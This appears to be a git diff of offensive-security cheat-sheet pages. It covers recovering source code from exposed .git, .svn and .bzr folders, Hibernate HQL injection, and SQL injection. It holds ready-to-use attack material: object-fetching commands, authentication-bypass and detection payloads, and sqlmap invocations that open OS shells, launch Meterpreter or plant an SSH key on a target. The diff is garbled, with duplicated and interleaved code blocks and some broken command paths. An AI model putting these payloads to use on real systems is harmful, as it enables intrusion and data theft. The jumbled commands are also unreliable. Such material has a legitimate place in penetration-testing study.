0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git
15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000 commit: Initial.
26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael <michael@easyctf.com> 1489390330 +0000 commit: Whoops! Remove flag.
6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael <michael@easyctf.com> 1489390332 +0000 commit: Prevent directory listing.
```
```powershell
0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git
15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000 commit: Initial.
26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael <michael@easyctf.com> 1489390330 +0000 commit: Whoops! Remove flag.
6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael <michael@easyctf.com> 1489390332 +0000 commit: Prevent directory listing.
```
3. Access the commit using the hash
```powershell
# create an empty .git repository
git init test
cd test/.git
# download the file
wget http://web.site/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c
```powershell
# create an empty .git repository
git init test
cd test/.git
# first byte for subdirectory, remaining bytes for filename
mkdir .git/object/26
mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/
# download the file
wget http://web.site/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c
# first byte for subdirectory, remaining bytes for filename
mkdir .git/object/26
mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/
# display the file
git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c
tree 323240a3983045cdc0dec2e88c1358e7998f2e39
parent 15ca375e54f056a576905b41a417b413c57df6eb
author Michael <michael@easyctf.com> 1489390329 +0000
committer Michael <michael@easyctf.com> 1489390329 +0000
Initial.
```
# display the file
git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c
tree 323240a3983045cdc0dec2e88c1358e7998f2e39
parent 15ca375e54f056a576905b41a417b413c57df6eb
author Michael <michael@easyctf.com> 1489390329 +0000
committer Michael <michael@easyctf.com> 1489390329 +0000
Initial.
```
4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39
```powershell
wget http://web.site/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
mkdir .git/object/32
mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/
git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39
040000 tree bd083286051cd869ee6485a3046b9935fbd127c0 css
100644 blob cb6139863967a752f3402b3975e97a84d152fd8f flag.txt
040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97 fonts
100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1 index.html
040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8 js
```
```powershell
wget http://web.site/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
mkdir .git/object/32
mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/
git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39
040000 tree bd083286051cd869ee6485a3046b9935fbd127c0 css
100644 blob cb6139863967a752f3402b3975e97a84d152fd8f flag.txt
040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97 fonts
100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1 index.html
040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8 js
```
5. Read the data (flag.txt)
```powershell
wget http://web.site/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f
mkdir .git/object/cb
mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/
git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
```
```powershell
wget http://web.site/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f
mkdir .git/object/cb
mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/
git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
```
#### Recovering file contents from .git/index
@ -106,14 +110,14 @@ gin ~/git-repo/.git/index
Recover name and sha1 hash of every file listed in the index, and use the same process above to recover the file.
```powershell
$ gin .git/index | egrep -e "name|sha1"
$ gin .git/index | egrep -e "name|sha1"
name = AWS Amazon Bucket S3/README.md
sha1 = 862a3e58d138d6809405aa062249487bee074b98
name = CRLF injection/README.md
sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
```
### Tools
#### Automatic recovery
@ -126,12 +130,12 @@ pip install -r requirements.txt
./git-dumper.py http://web.site/.git ~/website
```
##### digit.py
##### diggit.py
```powershell
git clone https://github.com/bl4de/security-tools/ && cd security-tools/digit
./digit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True]
./digit.py -u http://web.site -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1
git clone https://github.com/bl4de/security-tools/ && cd security-tools/diggit
./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True]
./diggit.py -u http://web.site -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1
-u is remote path, where .git folder exists
-t is path to local folder with dummy Git repository and where blob content (files) are saved with their real names (cd /path/to/temp/folder && git init)
@ -153,7 +157,7 @@ git checkout
git clone https://github.com/kost/dvcs-ripper
perl rip-git.pl -v -u "http://web.site/.git/"
git cat-file -p 07603070376d63d911f608120eb4b5489b507692
git cat-file -p 07603070376d63d911f608120eb4b5489b507692
tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
parent 15ca375e54f056a576905b41a417b413c57df6eb
author Michael <michael@easyctf.com> 1489389105 +0000
@ -235,14 +239,14 @@ curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
```
1. Download the svn database from http://server/path_to_vulnerable_site/.svn/wc.db
```powershell
INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL);
```
```powershell
INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL);
```
2. Download interesting files
* remove \$sha1\$ prefix
* add .svn-base postfix
* use first byte from hash as a subdirectory of the `pristine/` directory (`94` in this case)
* create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base`
- remove \$sha1\$ prefix
- add .svn-base postfix
- use first byte from hash as a subdirectory of the `pristine/` directory (`94` in this case)
- create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base`
### Tools
@ -269,7 +273,7 @@ docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-b
```powershell
git clone https://github.com/SeahunOh/bzr_dumper
python3 dumper.py -u "http://127.0.0.1:5000/" -o source
Created a standalone tree (format: 2a)
Created a standalone tree (format: 2a)
[!] Target : http://127.0.0.1:5000/
[+] Start.
[+] GET repository/pack-names
@ -286,7 +290,7 @@ Created a standalone tree (format: 2a)
$ bzr revert
N application.py
N database.py
N static/
N static/
```
## Mercurial
@ -303,5 +307,5 @@ docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-h
## References
- [bl4de, hidden_directories_leaks](https://github.com/bl4de/research/tree/master/hidden_directories_leaks)
- [bl4de, digit](https://github.com/bl4de/security-tools/tree/master/digit)
- [bl4de, diggit](https://github.com/bl4de/security-tools/tree/master/diggit)
- [Gitrob: Now in Go - Michael Henriksen](https://michenriksen.com/blog/gitrob-now-in-go/)

50
Methodology and Resources/Network Pivoting Techniques.md
View File

@ -2,28 +2,28 @@
:warning: Content of this page has been moved to [InternalAllTheThings/redteam/pivoting/network-pivoting-techniques](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/)
* [SOCKS Compatibility Table](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#socks-compatibility-table)
* [Windows netsh Port Forwarding](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#windows-netsh-port-forwarding)
* [SSH](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#ssh)
* [SOCKS Proxy](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#socks-proxy)
* [Local Port Forwarding](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#local-port-forwarding)
* [Remote Port Forwarding](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#remote-port-forwarding)
* [Proxychains](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#proxychains)
* [Graftcp](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#graftcp)
* [Web SOCKS - reGeorg](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#web-socks---regeorg)
* [Web SOCKS - pivotnacci](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#web-socks---pivotnacci)
* [Metasploit](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#metasploit)
* [sshuttle](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#sshuttle)
* [chisel](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#chisel)
* [SharpChisel](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#sharpchisel)
* [ghost](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#ghost)
* [Rpivot](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#rpivot)
* [RevSocks](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#revsocks)
* [plink](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#plink)
* [ngrok](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#ngrok)
* [Capture a network trace with builtin tools](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#capture-a-network-trace-with-builtin-tools)
* [Basic Pivoting Types](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#basic-pivoting-types)
* [Listen - Listen](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#listen---listen)
* [Listen - Connect](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#listen---connect)
* [Connect - Connect](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#connect---connect)
* [References](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#references)
- [SOCKS Compatibility Table](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#socks-compatibility-table)
- [Windows netsh Port Forwarding](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#windows-netsh-port-forwarding)
- [SSH](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#ssh)
- [SOCKS Proxy](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#socks-proxy)
- [Local Port Forwarding](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#local-port-forwarding)
- [Remote Port Forwarding](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#remote-port-forwarding)
- [Proxychains](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#proxychains)
- [Graftcp](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#graftcp)
- [Web SOCKS - reGeorg](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#web-socks---regeorg)
- [Web SOCKS - pivotnacci](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#web-socks---pivotnacci)
- [Metasploit](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#metasploit)
- [sshuttle](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#sshuttle)
- [chisel](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#chisel)
- [SharpChisel](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#sharpchisel)
- [gost](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#gost)
- [Rpivot](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#rpivot)
- [RevSocks](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#revsocks)
- [plink](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#plink)
- [ngrok](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#ngrok)
- [Capture a network trace with builtin tools](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#capture-a-network-trace-with-builtin-tools)
- [Basic Pivoting Types](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#basic-pivoting-types)
- [Listen - Listen](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#listen---listen)
- [Listen - Connect](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#listen---connect)
- [Connect - Connect](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#connect---connect)
- [References](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#references)

38
SQL Injection/HQL Injection.md
View File

@ -1,19 +1,19 @@
# Hibernate Query Language Injection
# Hibernate Query Language Injection
> Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. It provides a framework for mapping an object-oriented domain model to a relational database. - Wikipedia
## Summary
* [HQL Comments](#hql-comments)
* [HQL List Columns](#hql-list-columns)
* [HQL Error Based](#hql-error-based)
* [Single Quote Escaping](#single-quote-escaping)
* [$-quoted strings](#--quoted-strings)
* [DBMS Magic functions](#dbms-magic-functions)
* [Unicode](#unicode)
* [Java constants](#java-constants)
* [Methods by DBMS](#methods-by-dbms)
* [References](#references)
- [HQL Comments](#hql-comments)
- [HQL List Columns](#hql-list-columns)
- [HQL Error Based](#hql-error-based)
- [Single Quote Escaping](#single-quote-escaping)
- [$-quoted strings](#--quoted-strings)
- [DBMS Magic functions](#dbms-magic-functions)
- [Unicode](#unicode)
- [Java constants](#java-constants)
- [Methods by DBMS](#methods-by-dbms)
- [References](#references)
:warning: Your input will always be between the percentage symbols: `%INJECT_HERE%`
@ -28,7 +28,7 @@ HQL does not support comments
```sql
from BlogPosts
where title like '%'
and DOESNT_EXIST=1 and ''='%' --
and DOESNT_EXIST=1 and ''='%' --
and published = true
```
@ -120,7 +120,7 @@ Hibernate resolves Java public static fields (Java constants) in HQL queries:
- Ex. `java.lang.Character.SIZE` is resolved to 16
- String or char constants are additionally surrounded by single quotes
To use JAVA CONSTANTS method we need special char or string fields declared in classes or interfaces on classpath.
To use JAVA CONSTANTS method we need special char or string fields declared in classes or interfaces on classpath.
```java
public class Constants {
@ -156,9 +156,9 @@ dummy' and hqli.persistent.Constants.C_QUOTE_1*X('<>CHAR(41) and (select count(1
## References
* [HQL for pentesters - February 12, 2014 - Philippe Arteau](https://blog.h3xstream.com/2014/02/hql-for-pentesters.html)
* [How to put a comment into HQL (Hibernate Query Language)? - Thomas Bratt](https://stackoverflow.com/questions/3196975/how-to-put-a-comment-into-hql-hibernate-query-language)
* [HQL : Hyperinsane Query Language - 04/06/2015 - Renaud Dubourguais](https://www.synacktiv.com/resources/hql2sql_sstic_2015_en.pdf)
* [ORM2Pwn: Exploiting injections in Hibernate ORM - Nov 26, 2015 - Mikhail Egorov](https://www.slideshare.net/0ang3el/orm2pwn-exploiting-injections-in-hibernate-orm)
* [New Methods for Exploiting ORM Injections in Java Applications - HITBSecConf2016 - Mikhail Egorov - Sergey Soldatov](https://conference.hitb.org/hitbsecconf2016ams/materials/D2T2%20-%20Mikhail%20Egorov%20and%20Sergey%20Soldatov%20-%20New%20Methods%20for%20Exploiting%20ORM%20Injections%20in%20Java%20Applications.pdf)
* [HQL Injection Exploitation in MySQL - July 18, 2019 - Olga Barinova](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hql-injection-exploitation-in-mysql/)
- [HQL for pentesters - February 12, 2014 - Philippe Arteau](https://blog.h3xstream.com/2014/02/hql-for-pentesters.html)
- [How to put a comment into HQL (Hibernate Query Language)? - Thomas Bratt](https://stackoverflow.com/questions/3196975/how-to-put-a-comment-into-hql-hibernate-query-language)
- [HQL : Hyperinsane Query Language - 04/06/2015 - Renaud Dubourguais](https://www.synacktiv.com/ressources/hql2sql_sstic_2015_en.pdf)
- [ORM2Pwn: Exploiting injections in Hibernate ORM - Nov 26, 2015 - Mikhail Egorov](https://www.slideshare.net/0ang3el/orm2pwn-exploiting-injections-in-hibernate-orm)
- [New Methods for Exploiting ORM Injections in Java Applications - HITBSecConf2016 - Mikhail Egorov - Sergey Soldatov](https://conference.hitb.org/hitbsecconf2016ams/materials/D2T2%20-%20Mikhail%20Egorov%20and%20Sergey%20Soldatov%20-%20New%20Methods%20for%20Exploiting%20ORM%20Injections%20in%20Java%20Applications.pdf)
- [HQL Injection Exploitation in MySQL - July 18, 2019 - Olga Barinova](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hql-injection-exploitation-in-mysql/)

371
SQL Injection/README.md
View File

@ -3,6 +3,7 @@
> A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application.
Attempting to manipulate SQL queries may have goals including:
- Information Leakage
- Disclosure of stored data
- Manipulation of stored data
@ -10,54 +11,53 @@ Attempting to manipulate SQL queries may have goals including:
## Summary
* [CheatSheets](#cheatsheets)
* [MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md)
* [MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
* [OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/OracleSQL%20Injection.md)
* [PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md)
* [SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md)
* [Cassandra Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/Cassandra%20Injection.md)
* [HQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/HQL%20Injection.md)
* [DB2 Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/DB2%20Injection.md)
* [Entry point detection](#entry-point-detection)
* [DBMS Identification](#dbms-identification)
* [SQL injection using SQLmap](#sql-injection-using-sqlmap)
* [Basic arguments for SQLmap](#basic-arguments-for-sqlmap)
* [Load a request file and use mobile user-agent](#load-a-request-file-and-use-mobile-user-agent)
* [Custom injection in UserAgent/Header/Referer/Cookie](#custom-injection-in-useragentheaderreferercookie)
* [Second order injection](#second-order-injection)
* [Shell](#shell)
* [Crawl a website with SQLmap and auto-exploit](#crawl-a-website-with-sqlmap-and-auto-exploit)
* [Using TOR with SQLmap](#using-tor-with-sqlmap)
* [Using a proxy with SQLmap](#using-a-proxy-with-sqlmap)
* [Using Chrome cookie and a Proxy](#using-chrome-cookie-and-a-proxy)
* [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection)
* [General tamper option and tamper's list](#general-tamper-option-and-tampers-list)
* [SQLmap without SQL injection](#sqlmap-without-sql-injection)
* [Authentication bypass](#authentication-bypass)
* [Authentication Bypass (Raw MD5 SHA1)](#authentication-bypass-raw-md5-sha1)
* [Polyglot injection](#polyglot-injection-multicontext)
* [Routed injection](#routed-injection)
* [Insert Statement - ON DUPLICATE KEY UPDATE](#insert-statement---on-duplicate-key-update)
* [Generic WAF Bypass](#generic-waf-bypass)
* [White spaces alternatives](#white-spaces-alternatives)
* [No Comma Allowed](#no-comma-allowed)
* [No Equal Allowed](#no-equal-allowed)
* [Case modification](#case-modification)
- [CheatSheets](#cheatsheets)
- [MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md)
- [MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
- [OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/OracleSQL%20Injection.md)
- [PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md)
- [SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md)
- [Cassandra Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/Cassandra%20Injection.md)
- [HQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/HQL%20Injection.md)
- [DB2 Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/DB2%20Injection.md)
- [Entry point detection](#entry-point-detection)
- [DBMS Identification](#dbms-identification)
- [SQL injection using SQLmap](#sql-injection-using-sqlmap)
- [Basic arguments for SQLmap](#basic-arguments-for-sqlmap)
- [Load a request file and use mobile user-agent](#load-a-request-file-and-use-mobile-user-agent)
- [Custom injection in UserAgent/Header/Referer/Cookie](#custom-injection-in-useragentheaderreferercookie)
- [Second order injection](#second-order-injection)
- [Shell](#shell)
- [Crawl a website with SQLmap and auto-exploit](#crawl-a-website-with-sqlmap-and-auto-exploit)
- [Using TOR with SQLmap](#using-tor-with-sqlmap)
- [Using a proxy with SQLmap](#using-a-proxy-with-sqlmap)
- [Using Chrome cookie and a Proxy](#using-chrome-cookie-and-a-proxy)
- [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection)
- [General tamper option and tamper's list](#general-tamper-option-and-tampers-list)
- [SQLmap without SQL injection](#sqlmap-without-sql-injection)
- [Authentication bypass](#authentication-bypass)
- [Authentication Bypass (Raw MD5 SHA1)](#authentication-bypass-raw-md5-sha1)
- [Polyglot injection](#polyglot-injection-multicontext)
- [Routed injection](#routed-injection)
- [Insert Statement - ON DUPLICATE KEY UPDATE](#insert-statement---on-duplicate-key-update)
- [Generic WAF Bypass](#generic-waf-bypass)
- [White spaces alternatives](#white-spaces-alternatives)
- [No Comma Allowed](#no-comma-allowed)
- [No Equal Allowed](#no-equal-allowed)
- [Case modification](#case-modification)
## Tools
* [sqlmapproject/sqlmap](https://github.com/sqlmapproject/sqlmap) - Automatic SQL injection and database takeover tool
* [r0oth3x49/ghauri](https://github.com/r0oth3x49/ghauri) - An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws
- [sqlmapproject/sqlmap](https://github.com/sqlmapproject/sqlmap) - Automatic SQL injection and database takeover tool
- [r0oth3x49/ghauri](https://github.com/r0oth3x49/ghauri) - An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws
## Entry point detection
Detection of an SQL injection entry point
* **Error Messages**: Inputting special characters (e.g., a single quote ') into input fields might trigger SQL errors. If the application displays detailed error messages, it can indicate a potential SQL injection point.
* Simple characters
- **Error Messages**: Inputting special characters (e.g., a single quote ') into input fields might trigger SQL errors. If the application displays detailed error messages, it can indicate a potential SQL injection point.
- Simple characters
```sql
'
%27
@ -71,19 +71,20 @@ Detection of an SQL injection entry point
Wildcard (*)
&apos; # required for XML content
```
* Multiple encoding
- Multiple encoding
```sql
%%2727
%25%27
```
* Unicode characters
- Unicode characters
```
Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was transformed into U+0022 QUOTATION MARK (")
Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was transformed into U+0027 APOSTROPHE (')
```
* **Tautology-Based SQL Injection**: By inputting tautological (always true) conditions, you can test for vulnerabilities. For instance, entering `admin' OR '1'='1` in a username field might log you in as the admin if the system is vulnerable.
* Merging characters
- **Tautology-Based SQL Injection**: By inputting tautological (always true) conditions, you can test for vulnerabilities. For instance, entering `admin' OR '1'='1` in a username field might log you in as the admin if the system is vulnerable.
- Merging characters
```sql
`+HERP
'||'DERP
@ -92,7 +93,7 @@ Detection of an SQL injection entry point
'%20'HERP
'%2B'HERP
```
* Logic Testing
- Logic Testing
```sql
page.asp?id=1 or 1=1 -- true
page.asp?id=1' or 1=1 -- true
@ -100,9 +101,7 @@ Detection of an SQL injection entry point
page.asp?id=1 and 1=2 -- false
```
* **Timing Attacks**: Inputting SQL commands that cause deliberate delays (e.g., using `SLEEP` or `BENCHMARK` functions in MySQL) can help identify potential injection points. If the application takes an unusually long time to respond after such input, it might be vulnerable.
- **Timing Attacks**: Inputting SQL commands that cause deliberate delays (e.g., using `SLEEP` or `BENCHMARK` functions in MySQL) can help identify potential injection points. If the application takes an unusually long time to respond after such input, it might be vulnerable.
## DBMS Identification
@ -128,7 +127,7 @@ Detection of an SQL injection entry point
["last_insert_rowid()>1" ,"SQLITE"],
["last_insert_rowid()=last_insert_rowid()" ,"SQLITE"],
["val(cvar(1))=1" ,"MSACCESS"],
["IF(ATN(2)>0,1,0) BETWEEN 2 AND 0" ,"MSACCESS"],
["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0" ,"MSACCESS"],
["cdbl(1)=cdbl(1)" ,"MSACCESS"],
["1337=1337", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
["'i'='i'", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
@ -136,19 +135,19 @@ Detection of an SQL injection entry point
## DBMS Identification VIA Error
DBMS | Example Error Message | Example Payload |
|---------------------|------------------------------------------------------------------------------------------|-----------------|
| MySQL | `You have an error in your SQL syntax; ... near '' at line 1` | `'` |
| PostgreSQL | `ERROR: unterminated quoted string at or near "'"` | `'` |
| PostgreSQL | `ERROR: syntax error at or near "1"` | `1'` |
| Microsoft SQL Server| `Unclosed quotation mark after the character string ''.` | `'` |
| Microsoft SQL Server| `Incorrect syntax near ''.` | `'` |
| Microsoft SQL Server| `The conversion of the varchar value to data type int resulted in an out-of-range value.`| `1'` |
| Oracle | `ORA-00933: SQL command not properly ended` | `'` |
| Oracle | `ORA-01756: quoted string not properly terminated` | `'` |
| Oracle | `ORA-00923: FROM keyword not found where expected` | `1'` |
------------------------------------------------------------------------------------------------------------------------------------
| DBMS | Example Error Message | Example Payload |
| -------------------- | ----------------------------------------------------------------------------------------- | --------------- |
| MySQL | `You have an error in your SQL syntax; ... near '' at line 1` | `'` |
| PostgreSQL | `ERROR: unterminated quoted string at or near "'"` | `'` |
| PostgreSQL | `ERROR: syntax error at or near "1"` | `1'` |
| Microsoft SQL Server | `Unclosed quotation mark after the character string ''.` | `'` |
| Microsoft SQL Server | `Incorrect syntax near ''.` | `'` |
| Microsoft SQL Server | `The conversion of the varchar value to data type int resulted in an out-of-range value.` | `1'` |
| Oracle | `ORA-00933: SQL command not properly ended` | `'` |
| Oracle | `ORA-01756: quoted string not properly terminated` | `'` |
| Oracle | `ORA-00923: FROM keyword not found where expected` | `1'` |
---
## SQL injection using SQLmap
@ -182,11 +181,10 @@ sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrat
### Shell
* SQL Shell: `python sqlmap.py -u "http://example.com/?id=1" -p id --sql-shell`
* OS Shell: `python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell`
* Meterpreter: `python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn`
* SSH Shell: `python sqlmap.py -u "http://example.com/?id=1" -p id --file-write=/root/.ssh/id_rsa.pub --file-destination=/home/user/.ssh/`
- SQL Shell: `python sqlmap.py -u "http://example.com/?id=1" -p id --sql-shell`
- OS Shell: `python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell`
- Meterpreter: `python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn`
- SSH Shell: `python sqlmap.py -u "http://example.com/?id=1" -p id --file-write=/root/.ssh/id_rsa.pub --file-destination=/home/user/.ssh/`
### Crawl a website with SQLmap and auto-exploit
